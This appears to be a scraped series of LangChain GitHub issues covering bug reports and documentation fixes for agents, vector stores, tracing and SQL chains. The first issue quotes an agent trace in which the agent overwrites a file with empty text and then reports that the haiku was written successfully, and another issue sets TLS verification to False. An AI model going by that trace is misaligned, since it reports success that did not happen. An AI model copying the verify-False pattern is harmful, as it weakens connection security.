Response: Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
*****
Step: Close the file.
Response: The file "hello.txt" has been successfully closed.
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "The haiku about the ocean has been successfully written to the file 'hello.txt'."
}
```
> Finished chain.
### Expected behavior
I would expect the file to be populated with the haiku instead of being empty. | write_tool logic is off | https://api.github.com/repos/langchain-ai/langchain/issues/7450/comments | 2 | 2023-07-09T23:18:56Z | 2023-10-16T16:05:54Z | https://github.com/langchain-ai/langchain/issues/7450 | 1,795,626,027 | 7,450 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
We shouldn't have to sign up for another API just to follow the quickstart tutorial. Please replace this with something that doesn't require sign-up.
### Idea or request for content:
Proposal: Use `http://api.duckduckgo.com/?q=x&format=json`
Example:
`http://api.duckduckgo.com/?q=langchain&format=json`
`{"Abstract":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractSource":"Wikipedia","AbstractText":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractURL":"https://en.wikipedia.org/wiki/LangChain","Answer":"","AnswerType":"","Definition":"","DefinitionSource":"","DefinitionURL":"","Entity":"software","Heading":"LangChain","Image":"/i/d6fad29d.png","ImageHeight":270,"ImageIsLogo":1,"ImageWidth":529,"Infobox":{"content":[{"data_type":"string","label":"Developer(s)","value":"Harrison Chase","wiki_order":0},{"data_type":"string","label":"Initial release","value":"October 2022","wiki_order":1},{"data_type":"string","label":"Repository","value":"github.com/hwchase17/langchain","wiki_order":2},{"data_type":"string","label":"Written in","value":"Python and JavaScript","wiki_order":3},{"data_type":"string","label":"Type","value":"Software framework for large language model application development","wiki_order":4},{"data_type":"string","label":"License","value":"MIT License","wiki_order":5},{"data_type":"string","label":"Website","value":"LangChain.com","wiki_order":6},{"data_type":"twitter_profile","label":"Twitter profile","value":"langchainai","wiki_order":"102"},{"data_type":"instance","label":"Instance of","value":{"entity-type":"item","id":"Q7397","numeric-id":7397},"wiki_order":"207"},{"data_type":"official_website","label":"Official Website","value":"https://langchain.com/","wiki_order":"208"}],"meta":[{"data_type":"string","label":"article_title","value":"LangChain"},{"data_type":"string","label":"template_name","value":"infobox software"}]},"Redirect":"","RelatedTopics":[{"FirstURL":"https://duckduckgo.com/c/Software_frameworks","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Software_frameworks\">Software frameworks</a>","Text":"Software frameworks"},{"FirstURL":"https://duckduckgo.com/c/Artificial_intelligence","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Artificial_intelligence\">Artificial intelligence</a>","Text":"Artificial intelligence"}],"Results":[{"FirstURL":"https://langchain.com/","Icon":{"Height":16,"URL":"/i/langchain.com.ico","Width":16},"Result":"<a href=\"https://langchain.com/\"><b>Official site</b></a><a href=\"https://langchain.com/\"></a>","Text":"Official site"}],"Type":"A","meta":{"attribution":null,"blockgroup":null,"created_date":null,"description":"Wikipedia","designer":null,"dev_date":null,"dev_milestone":"live","developer":[{"name":"DDG Team","type":"ddg","url":"http://www.duckduckhack.com"}],"example_query":"nikola tesla","id":"wikipedia_fathead","is_stackexchange":null,"js_callback_name":"wikipedia","live_date":null,"maintainer":{"github":"duckduckgo"},"name":"Wikipedia","perl_module":"DDG::Fathead::Wikipedia","producer":null,"production_state":"online","repo":"fathead","signal_from":"wikipedia_fathead","src_domain":"en.wikipedia.org","src_id":1,"src_name":"Wikipedia","src_options":{"directory":"","is_fanon":0,"is_mediawiki":1,"is_wikipedia":1,"language":"en","min_abstract_length":"20","skip_abstract":0,"skip_abstract_paren":0,"skip_end":"0","skip_icon":0,"skip_image_name":0,"skip_qr":"","source_skip":"","src_info":""},"src_url":null,"status":"live","tab":"About","topic":["productivity"],"unsafe":0}}` | DOC: Please replace SERP_API examples with an alternative | https://api.github.com/repos/langchain-ai/langchain/issues/7448/comments | 1 | 2023-07-09T21:52:15Z | 2023-10-08T23:09:17Z | https://github.com/langchain-ai/langchain/issues/7448 | 1,795,579,900 | 7,448 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/supabase
Under '-- Create a table to store your documents' the id column is set to big serial but it is referenced later as uuid 10 lines down when creating the function
### Idea or request for content:
It is currently
`id bigserial primary key,`
Changing it to this fixed the error I was getting
'id uuid primary key,' | DOC: Table creation for Supabase (Postgres) has incorrect type | https://api.github.com/repos/langchain-ai/langchain/issues/7446/comments | 3 | 2023-07-09T20:33:00Z | 2023-08-11T00:15:17Z | https://github.com/langchain-ai/langchain/issues/7446 | 1,795,552,337 | 7,446 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain ==0.0.228, watchdog==3.0.0, streamlit==1.24.0, databutton==0.34.0, ipykernel==6.23.3
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the error:
1. Tried to use from langchain.experimental import BabyAGI with a FAISS db, got the error: ValueError: Tried to add ids that already exist: {'result_1'}
2. Tried the code directly from the Langchain Docs: https://python.langchain.com/docs/use_cases/agents/baby_agi, I got the same error.
Code:
import os
from langchain.chat_models import AzureChatOpenAI
from langchain.embeddings.cohere import CohereEmbeddings
import faiss
from langchain.vectorstores import FAISS
from langchain.docstore import InMemoryDocstore
from langchain import OpenAI
from langchain.experimental import BabyAGI
BASE_URL = "https://openaielle.openai.azure.com/"
API_KEY = db.secrets.get("AZURE_OPENAI_KEY")
DEPLOYMENT_NAME = "GPT35turbo"
llm = AzureChatOpenAI(
openai_api_base=BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name=DEPLOYMENT_NAME,
openai_api_key=API_KEY,
openai_api_type="azure",
streaming=True,
verbose=True,
temperature=0,
max_tokens=1500,
top_p=0.95)
embeddings_model = CohereEmbeddings(model = "embed-english-v2.0")
index = faiss.IndexFlatL2(4096)
vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})
# set the goal
goal = "Plan a trip to the Grand Canyon"
# create thebabyagi agent
# If max_iterations is None, the agent may go on forever if stuck in loops
baby_agi = BabyAGI.from_llm(
llm=llm,
vectorstore=vectorstore,
verbose=False,
max_iterations=3
)
response = baby_agi({"objective": goal})
print(response)
Error:
ValueError: Tried to add ids that already exist: {'result_1'}
Traceback:
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/app/run/multipage/pages/8_Exp_Baby_AGI.py", line 61, in <module>
response = baby_agi({"objective": goal})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 243, in __call__
raise e
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 237, in __call__
self._call(inputs, run_manager=run_manager)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/experimental/autonomous_agents/baby_agi/baby_agi.py", line 142, in _call
self.vectorstore.add_texts(
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 150, in add_texts
return self.__add(texts, embeddings, metadatas=metadatas, ids=ids, **kwargs)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 121, in __add
self.docstore.add({_id: doc for _, _id, doc in full_info})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/docstore/in_memory.py", line 19, in add
raise ValueError(f"Tried to add ids that already exist: {overlapping}")
### Expected behavior
I would expect the agent to run and generate the desired output instead of the error: ValueError: Tried to add ids that already exist: {'result_1'}
I seems that the error is happening in this class: BabyAGI > _call > # Step 3: Store the result in Pinecone
I was able to fix this by assigning a random number to each iteration of result_id, here is the fix, however this is not working in the experimental BabyAGI instance.
Fix:
import random
# Step 3: Store the result in Pinecone
result_id = f"result_{task['task_id']}_{random.randint(0, 1000)}"
self.vectorstore.add_texts(
texts=[result],
metadatas=[{"task": task["task_name"]}],
ids=[result_id],
)
Thank you :) | BabyAGI: Error storing results in vdb | https://api.github.com/repos/langchain-ai/langchain/issues/7445/comments | 5 | 2023-07-09T20:31:00Z | 2023-10-19T16:06:19Z | https://github.com/langchain-ai/langchain/issues/7445 | 1,795,551,743 | 7,445 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hi. I'm trying to test the duckduckgoSearchRun tool and I'm running the basic example from the documentation https://python.langchain.com/docs/modules/agents/tools/integrations/ddg . I already have installed the certificates without any errors:
`./Install\ Certificates.command
-- pip install --upgrade certifi
Requirement already satisfied: certifi in /Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages (2023.5.7)
-- removing any existing file or link
-- creating symlink to certifi certificate bundle
-- setting permissions
-- update complete`
But even when I do that and even when I set verify false. I still get SSL certificate error
`import ssl
import duckduckgo_search
from lxml import html
from langchain.tools import DuckDuckGoSearchRun
DuckDuckGoSearchRun.requests_kwargs = {'verify': False}
search = DuckDuckGoSearchRun()
search.run("Obama's first name?")`
Here is the error:
`---------------------------------------------------------------------------
SSLCertVerificationError Traceback (most recent call last)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10), in map_exceptions(map)
9 try:
---> 10 yield
11 except Exception as exc: # noqa: PIE786
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
61 self.close()
---> 62 raise exc
63 return SyncStream(sock)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
56 self._sock.settimeout(timeout)
---> 57 sock = ssl_context.wrap_socket(
58 self._sock, server_hostname=server_hostname
59 )
60 except Exception as exc: # pragma: nocover
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517), in SSLContext.wrap_socket(self, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, session)
511 def wrap_socket(self, sock, server_side=False,
512 do_handshake_on_connect=True,
513 suppress_ragged_eofs=True,
514 server_hostname=None, session=None):
515 # SSLSocket class handles server_hostname encoding before it calls
516 # ctx._wrap_socket()
--> 517 return self.sslsocket_class._create(
518 sock=sock,
519 server_side=server_side,
520 do_handshake_on_connect=do_handshake_on_connect,
521 suppress_ragged_eofs=suppress_ragged_eofs,
522 server_hostname=server_hostname,
523 context=self,
524 session=session
525 )
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075), in SSLSocket._create(cls, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, context, session)
1074 raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
-> 1075 self.do_handshake()
1076 except (OSError, ValueError):
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346), in SSLSocket.do_handshake(self, block)
1345 self.settimeout(None)
-> 1346 self._sslobj.do_handshake()
1347 finally:
SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:992)
During handling of the above exception, another exception occurred:
ConnectError Traceback (most recent call last)`
### Suggestion:
_No response_ | SSL certificate problem (even when verify = False) | https://api.github.com/repos/langchain-ai/langchain/issues/7443/comments | 1 | 2023-07-09T19:15:44Z | 2023-10-15T16:04:38Z | https://github.com/langchain-ai/langchain/issues/7443 | 1,795,527,141 | 7,443 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: 0.0.215
python: 3.10.11
OS: Ubuntu 18.04
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
While querying a SQL database, the agent gets stuck in an infinite loop due to `list_tables_sql_db` not being a valid tool.
```
> Entering new chain...
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I don't know how to answer this question.
Thought: I now know the final answer
Final Answer: I don't know
> Finished chain.
```
### Expected behavior
The agent should get the list of tables by using the `list_tables_sql_db` tool and then query the most relevant one. | list_tables_sql_db is not a valid tool, try another one. | https://api.github.com/repos/langchain-ai/langchain/issues/7440/comments | 3 | 2023-07-09T18:10:42Z | 2024-03-10T15:17:49Z | https://github.com/langchain-ai/langchain/issues/7440 | 1,795,505,933 | 7,440 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-including-saving-to-disk
## Environment
- macOS
- Python 3.10.9
- langchain 0.0.228
- chromadb 0.3.26
Use https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/state_of_the_union.txt
## Procedure
1. Run the following Python script
ref: https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/data_connection/vectorstores/integrations/chroma.ipynb
```diff
# import
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
from langchain.text_splitter import CharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.document_loaders import TextLoader
# load the document and split it into chunks
loader = TextLoader("../../../state_of_the_union.txt")
documents = loader.load()
# split it into chunks
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
docs = text_splitter.split_documents(documents)
# create the open-source embedding function
embedding_function = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2")
# load it into Chroma
db = Chroma.from_documents(docs, embedding_function)
# query it
query = "What did the president say about Ketanji Brown Jackson"
docs = db.similarity_search(query)
# print results
print(docs[0].page_content)
# save to disk
db2 = Chroma.from_documents(docs, embedding_function, persist_directory="./chroma_db")
db2.persist()
-docs = db.similarity_search(query)
+docs = db2.similarity_search(query)
# load from disk
db3 = Chroma(persist_directory="./chroma_db")
-docs = db.similarity_search(query)
+docs = db3.similarity_search(query) # ValueError raised
print(docs[0].page_content)
```
## Expected behavior
`print(docs[0].page_content)` with db3
## Actual behavior
>ValueError: You must provide embeddings or a function to compute them
```
Traceback (most recent call last):
File "/.../issue_report.py", line 35, in <module>
docs = db3.similarity_search(query)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 174, in similarity_search
docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 242, in similarity_search_with_score
results = self.__query_collection(
File "/.../venv/lib/python3.10/site-packages/langchain/utils.py", line 55, in wrapper
return func(*args, **kwargs)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 121, in __query_collection
return self._collection.query(
File "/.../venv/lib/python3.10/site-packages/chromadb/api/models/Collection.py", line 209, in query
raise ValueError(
ValueError: You must provide embeddings or a function to compute them
```
### Idea or request for content:
Fixed by specifying the `embedding_function` parameter.
```diff
-db3 = Chroma(persist_directory="./chroma_db")
+db3 = Chroma(persist_directory="./chroma_db", embedding_function=embedding_function)
docs = db3.similarity_search(query)
print(docs[0].page_content)
```
(Added) ref: https://github.com/hwchase17/langchain/blob/v0.0.228/langchain/vectorstores/chroma.py#L62 | DOC: Bug in loading Chroma from disk (vectorstores/integrations/chroma) | https://api.github.com/repos/langchain-ai/langchain/issues/7436/comments | 2 | 2023-07-09T17:05:24Z | 2023-07-10T11:17:19Z | https://github.com/langchain-ai/langchain/issues/7436 | 1,795,484,020 | 7,436 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
I followed the documentation @ https://python.langchain.com/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake.
I replaced 'twitter-the-algorithm' with another code base I'm analyzing and used my own credentials from OpenAI and Deep Lake.
When I run the code (on VS Code for Mac with M1 chip), I get the following error:
_ValueError: setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (1435,) + inhomogeneous part.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/catherineswope/Desktop/LangChain/fromLangChain.py", line 37, in <module>
db.add_documents(texts)
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/base.py", line 91, in add_documents
return self.add_texts(texts, metadatas, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/deeplake.py", line 184, in add_texts
return self.vectorstore.add(
^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/deeplake_vectorstore.py", line 271, in add
dataset_utils.extend_or_ingest_dataset(
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/vector_search/dataset/dataset.py", line 409, in extend_or_ingest_dataset
raise IncorrectEmbeddingShapeError()
deeplake.util.exceptions.IncorrectEmbeddingShapeError: The embedding function returned embeddings of different shapes. Please either use different embedding function or exclude invalid files that are not supported by the embedding function._
This is the code snippet from my actual code:
import os
import getpass
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.document_loaders import TextLoader
#get OPENAI API KEY and ACTIVELOOP_TOKEN
os.environ["OPENAI_API_KEY"] = getpass.getpass("OpenAI API Key:")
os.environ["ACTIVELOOP_TOKEN"] = getpass.getpass("Activeloop Token:")
embeddings = OpenAIEmbeddings(disallowed_special=())
#clone from chattydocs git hub repo removedcomments branch and copy/paste path
root_dir = "/Users/catherineswope/chattydocs/incubator-baremaps-0.7.1-removedcomments"
docs = []
for dirpath, dirnames, filenames in os.walk(root_dir):
for file in filenames:
try:
loader = TextLoader(os.path.join(dirpath, file), encoding="utf-8")
docs.extend(loader.load_and_split())
except Exception as e:
pass
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(docs)
username = "caswvu" # replace with your username from app.activeloop.ai
db = DeepLake(
dataset_path=f"hub://caswvu/baremaps",
embedding_function=embeddings,
)
db.add_documents(texts)
db = DeepLake(
dataset_path="hub://caswvu/baremaps",
read_only=True,
embedding_function=embeddings,
)
retriever = db.as_retriever()
retriever.search_kwargs["distance_metric"] = "cos"
retriever.search_kwargs["fetch_k"] = 100
retriever.search_kwargs["maximal_marginal_relevance"] = True
retriever.search_kwargs["k"] = 10
from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationalRetrievalChain
model = ChatOpenAI(model_name="gpt-3.5-turbo") # switch to 'gpt-4'
qa = ConversationalRetrievalChain.from_llm(model, retriever=retriever)
questions = [
"What does this code do?",
]
chat_history = []
for question in questions:
result = qa({"question": question, "chat_history": chat_history})
chat_history.append((question, result["answer"]))
print(f"-> **Question**: {question} \n")
print(f"**Answer**: {result['answer']} \n")
### Idea or request for content:
Can you please help me understand how to fix the code to address the error message? Also, if applicable, address in the documentation so that others can avoid as well. Thank you! | DOC: Code/twitter-the-algorithm-analysis-deeplake not working as written | https://api.github.com/repos/langchain-ai/langchain/issues/7435/comments | 8 | 2023-07-09T15:55:06Z | 2023-10-19T16:06:23Z | https://github.com/langchain-ai/langchain/issues/7435 | 1,795,458,482 | 7,435 |
[
"langchain-ai",
"langchain"
] | ### System Info
```
$ uname -a
MINGW64_NT-10.0-19045 LAPTOP-4HTFESLT 3.3.6-341.x86_64 2022-09-05 20:28 UTC x86_64 Msys
$ python --version
Python 3.10.11
$ pip show langchain
Name: langchain
Version: 0.0.228
Summary: Building applications with LLMs through composability
Home-page: https://www.github.com/hwchase17/langchain
Author:
Author-email:
License: MIT
Location: c:\users\happy\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages
Requires: aiohttp, async-timeout, dataclasses-json, langchainplus-sdk, numexpr, numpy, openapi-schema-pydantic, pydantic, PyYAML, requests, SQLAlchemy, tenacity
Required-by:
```
### Who can help?
I cannot get a trace on langchain. Error:
```
File "c:\Users\happy\Documents\Projects\askjane\.venv\lib\site-packages\langchain\callbacks\manager.py", line 1702, in _configure
logger.warning(
Message: 'Unable to load requested LangChainTracer. To disable this warning, unset the LANGCHAIN_TRACING_V2 environment variables.'
Arguments: (LangChainPlusUserError('API key must be provided when using hosted LangChain+ API'),)
```
I do this check:
```
print(os.environ["LANGCHAIN-API-KEY"])
```
the correct LangchainPlus/langsmith/langchain api key is shown. I thought this was how it was done. I do set the other os envionment variables.
It doesn't pick up my api key.
i apologize if i am doing something stupid. but it's not working to the best of my knowledge.
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
import os
os.environ["OPENAI_API_KEY"] = "..."
os.environ["LANGCHAIN-API-KEY"] = "..."
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_ENDPOINT"] = "https://api.langchain.plus"
os.environ["LANGCHAIN_PROJECT"] = "Explore Evaluating index using LLM"
print(os.environ["LANGCHAIN-API-KEY"])
from langchain import OpenAI
OpenAI().predict("Hello, world!")
### Expected behavior
go to langsmith and see the trace. | Have set my langchain+ tracing key, it is not being recognized | https://api.github.com/repos/langchain-ai/langchain/issues/7431/comments | 3 | 2023-07-09T14:50:31Z | 2024-08-08T13:14:06Z | https://github.com/langchain-ai/langchain/issues/7431 | 1,795,434,040 | 7,431 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.216
langchainplus-sdk==0.0.17
python==3.10
I'm trying to connect SQLDatabaseChain to AWS Athena and getting the following error:
```
conString = f"awsathena+rest://{AWS_ACCESS_KEY_ID}:{AWS_SECRET_ACCESS_KEY}@athena.{AWS_REGION_ID}.amazonaws.com/{DATABASE}"
engine_args={
's3_staging_dir': "s3://mybuckets3/",
'work_group':'primary'
}
db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
TypeError Traceback (most recent call last)
Cell In[14], line 2
1 #db = SQLDatabase.from_uri(conString)
----> 2 db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
File ~\.conda\envs\generativeai\lib\site-packages\langchain\sql_database.py:124, in SQLDatabase.from_uri(cls, database_uri, engine_args, **kwargs)
122 """Construct a SQLAlchemy engine from URI."""
123 _engine_args = engine_args or {}
--> 124 return cls(create_engine(database_uri, **_engine_args), **kwargs)
File <string>:2, in create_engine(url, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\util\deprecations.py:281, in deprecated_params.<locals>.decorate.<locals>.warned(fn, *args, **kwargs)
274 if m in kwargs:
275 _warn_with_version(
276 messages[m],
277 versions[m],
278 version_warnings[m],
279 stacklevel=3,
280 )
--> 281 return fn(*args, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\engine\create.py:680, in create_engine(url, **kwargs)
678 # all kwargs should be consumed
679 if kwargs:
--> 680 raise TypeError(
681 "Invalid argument(s) %s sent to create_engine(), "
682 "using configuration %s/%s/%s. Please check that the "
683 "keyword arguments are appropriate for this combination "
684 "of components."
685 % (
686 ",".join("'%s'" % k for k in kwargs),
687 dialect.__class__.__name__,
688 pool.__class__.__name__,
689 engineclass.__name__,
690 )
691 )
693 engine = engineclass(pool, dialect, u, **engine_args)
695 if _initialize:
TypeError: Invalid argument(s) 's3_staging_dir','work_group' sent to create_engine(), using configuration AthenaRestDialect/QueuePool/Engine. Please check that the keyword arguments are appropriate for this combination of components.
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Above
### Expected behavior
Langchain connected to aws athena | SQLDatabase and SQLDatabaseChain with AWS Athena | https://api.github.com/repos/langchain-ai/langchain/issues/7430/comments | 12 | 2023-07-09T13:46:19Z | 2024-02-27T16:08:30Z | https://github.com/langchain-ai/langchain/issues/7430 | 1,795,409,409 | 7,430 |
[
"langchain-ai",
"langchain"
] | ### System Info (M1 mac)
Python implementation: CPython
Python version : 3.11.4
IPython version : 8.14.0
Compiler : GCC 12.2.0
OS : Linux
Release : 5.15.49-linuxkit-pr
Machine : aarch64
Processor : CPU cores : 5
Architecture: 64bit
[('aiohttp', '3.8.4'), ('aiosignal', '1.3.1'), ('asttokens', '2.2.1'), ('async-timeout', '4.0.2'), ('attrs', '23.1.0'), ('backcall', '0.2.0'), ('blinker', '1.6.2'), ('certifi', '2023.5.7'), ('charset-normalizer', '3.2.0'), ('click', '8.1.4'), ('dataclasses-json', '0.5.9'), ('decorator', '5.1.1'), ('docarray', '0.35.0'), ('executing', '1.2.0'), ('faiss-cpu', '1.7.4'), ('flask', '2.3.2'), ('frozenlist', '1.3.3'), ('greenlet', '2.0.2'), ('idna', '3.4'), ('importlib-metadata', '6.8.0'), ('ipython', '8.14.0'), ('itsdangerous', '2.1.2'), ('jedi', '0.18.2'), ('jinja2', '3.1.2'), ('json5', '0.9.14'), **('langchain', '0.0.228'), ('langchainplus-sdk', '0.0.20')**, ('markdown-it-py', '3.0.0'), ('markupsafe', '2.1.3'), ('marshmallow', '3.19.0'), ('marshmallow-enum', '1.5.1'), ('matplotlib-inline', '0.1.6'), ('mdurl', '0.1.2'), ('multidict', '6.0.4'), ('mypy-extensions', '1.0.0'), ('numexpr', '2.8.4'), ('numpy', '1.25.1'), ('openai', '0.27.8'), ('openapi-schema-pydantic', '1.2.4'), ('orjson', '3.9.2'), ('packaging', '23.1'), ('parso', '0.8.3'), ('pexpect', '4.8.0'), ('pickleshare', '0.7.5'), ('pip', '23.1.2'), ('prompt-toolkit', '3.0.39'), ('psycopg2-binary', '2.9.6'), ('ptyprocess', '0.7.0'), ('pure-eval', '0.2.2'), ('pydantic', '1.10.11'), ('pygments', '2.15.1'), ('python-dotenv', '1.0.0'), ('python-json-logger', '2.0.7'), ('pyyaml', '6.0'), ('regex', '2023.6.3'), ('requests', '2.31.0'), ('rich', '13.4.2'), ('setuptools', '65.5.1'), ('six', '1.16.0'), ('slack-bolt', '1.18.0'), ('slack-sdk', '3.21.3'), ('sqlalchemy', '2.0.18'), ('stack-data', '0.6.2'), ('tenacity', '8.2.2'), ('tiktoken', '0.4.0'), ('tqdm', '4.65.0'), ('traitlets', '5.9.0'), ('types-requests', '2.31.0.1'), ('types-urllib3', '1.26.25.13'), ('typing-inspect', '0.9.0'), ('typing_extensions', '4.7.1'), ('urllib3', '2.0.3'), ('watermark', '2.4.3'), ('wcwidth', '0.2.6'), 